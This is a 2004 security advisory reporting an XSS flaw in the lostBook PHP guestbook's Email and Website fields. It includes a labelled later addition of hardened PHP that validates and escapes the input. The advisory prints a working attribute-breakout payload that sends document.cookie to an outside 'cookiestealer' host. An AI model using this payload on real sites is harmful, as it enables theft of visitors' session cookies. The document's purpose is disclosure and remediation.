-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Product: lostBook
Vendor: veryLost (verylost.tk)
Affected Versions: 1.1 and lower
Description: A simple flat db guestbook
Vulnerabilities: XSS
Date: July 29, 2004
Vuln Finder: r3d5pik3 (me)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
1.) About
2.) Javascript Execution
3.) Vendor Notice
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
(o_O)oOoOoOo [ About ] oOoOoOo(O_o)
Ok, the only reason I consider this JavaScript execution instead of XSS is simply because you can't inject HTML like you can in most XSS vulnerabilities.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
(o_O)oOoOoOo [ JScript Execution ] oOoOoOo(O_o)
On the write entry page of the guestbook there are 4 fields: Name, Email, Website, Entry. The Email and Website fields go through no filtering, and a malicious hacker could use that to insert JavaScript.
Example:
The Website data gets output like so:
// $web comes straight from the Website field and is echoed unescaped into both the href and alt attributes
if(isset($web) && $web != "" && $web != " ") echo ' <a href="'.$web.'"><img src="'.$path2files.'website.gif" border="0" alt="'.$web.'"></a>';
An attacker would go about injecting XSS in the following way: by inputting the following into either the Email or Website field.
r3d5pik3.com" onload="document.location='http://www.cookiestealer.com?cookie='+document.cookie
If onload doesn't work, they could simply use onmouseover instead.
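As an added illustration (this is not lostBook's code and was not part of the original advisory), here is the vulnerable output line placed next to a hardened version that validates the Website and Email values and HTML-escapes them before they are written into attributes. The function names renderWebsiteVulnerable, renderWebsiteSafe and renderEmailSafe are assumptions made for this example, as is $path2files being the guestbook's image directory like in the original snippet.

```php
<?php
// Added example, not lostBook's own code. $path2files is assumed to be the
// guestbook image directory, as in the advisory's snippet.

$path2files = 'images/';

// Vulnerable form, mirroring the shipped line: $web lands unescaped inside
// href="" and alt="". A value containing a double quote closes the attribute
// and anything after it becomes a new attribute of the tag.
// (isset() is dropped here because a typed parameter is always set.)
function renderWebsiteVulnerable(string $web, string $path2files): string
{
    if ($web != "" && $web != " ") {
        return ' <a href="' . $web . '"><img src="' . $path2files . 'website.gif" border="0" alt="' . $web . '"></a>';
    }
    return '';
}

// Hardened form: accept only absolute http(s) URLs, then HTML-escape every
// value placed in an attribute. The escaping is the essential step; the scheme
// check additionally keeps javascript: and data: URLs out of href.
function renderWebsiteSafe(string $web, string $path2files): string
{
    $web = trim($web);
    if ($web === '') {
        return '';
    }
    // Reject anything that is not a well-formed URL.
    if (filter_var($web, FILTER_VALIDATE_URL) === false) {
        return '';
    }
    $scheme = strtolower((string) parse_url($web, PHP_URL_SCHEME));
    if ($scheme !== 'http' && $scheme !== 'https') {
        return '';
    }
    // ENT_QUOTES escapes both " and ', so the value can never close an attribute.
    $safeWeb  = htmlspecialchars($web, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    $safePath = htmlspecialchars($path2files, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return ' <a href="' . $safeWeb . '"><img src="' . $safePath . 'website.gif" border="0" alt="' . $safeWeb . '"></a>';
}

// Same treatment for the Email field: validate the address, then escape it.
function renderEmailSafe(string $email): string
{
    $email = trim($email);
    if ($email === '' || filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        return '';
    }
    $safe = htmlspecialchars($email, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return ' <a href="mailto:' . $safe . '">' . $safe . '</a>';
}

// Constructed sample input modelled on the advisory's attribute break-out.
$hostile = 'example.com" onload="alert(1)';

// With the vulnerable function the quote closes href and onload becomes a
// live attribute in the rendered markup.
echo "Vulnerable: " . renderWebsiteVulnerable($hostile, $path2files) . "\n";

// The hardened function rejects the same input because it is not a valid URL,
// so nothing at all is rendered for it.
echo "Hardened:   [" . renderWebsiteSafe($hostile, $path2files) . "]\n";

// A legitimate URL still renders, with & escaped inside the attributes.
echo "Hardened:   " . renderWebsiteSafe('https://example.com/?a=1&b=2', $path2files) . "\n";

// An address carrying a quote and an event handler fails FILTER_VALIDATE_EMAIL.
echo "Email:      [" . renderEmailSafe('bob" onmouseover="alert(1)') . "]\n";
```

Run it with `php example.php`. The point of the design is that the output functions never trust the stored guestbook value: validation limits what a URL or address may look like, and htmlspecialchars() with ENT_QUOTES guarantees that whatever survives validation cannot terminate the attribute it is written into.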
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
(o_O)oOoOoOo [ Vendor Notification ] oOoOoOo(O_o)
A couple seconds ago.
-r3d5pik3
ph33r t3h r3d 1z !!!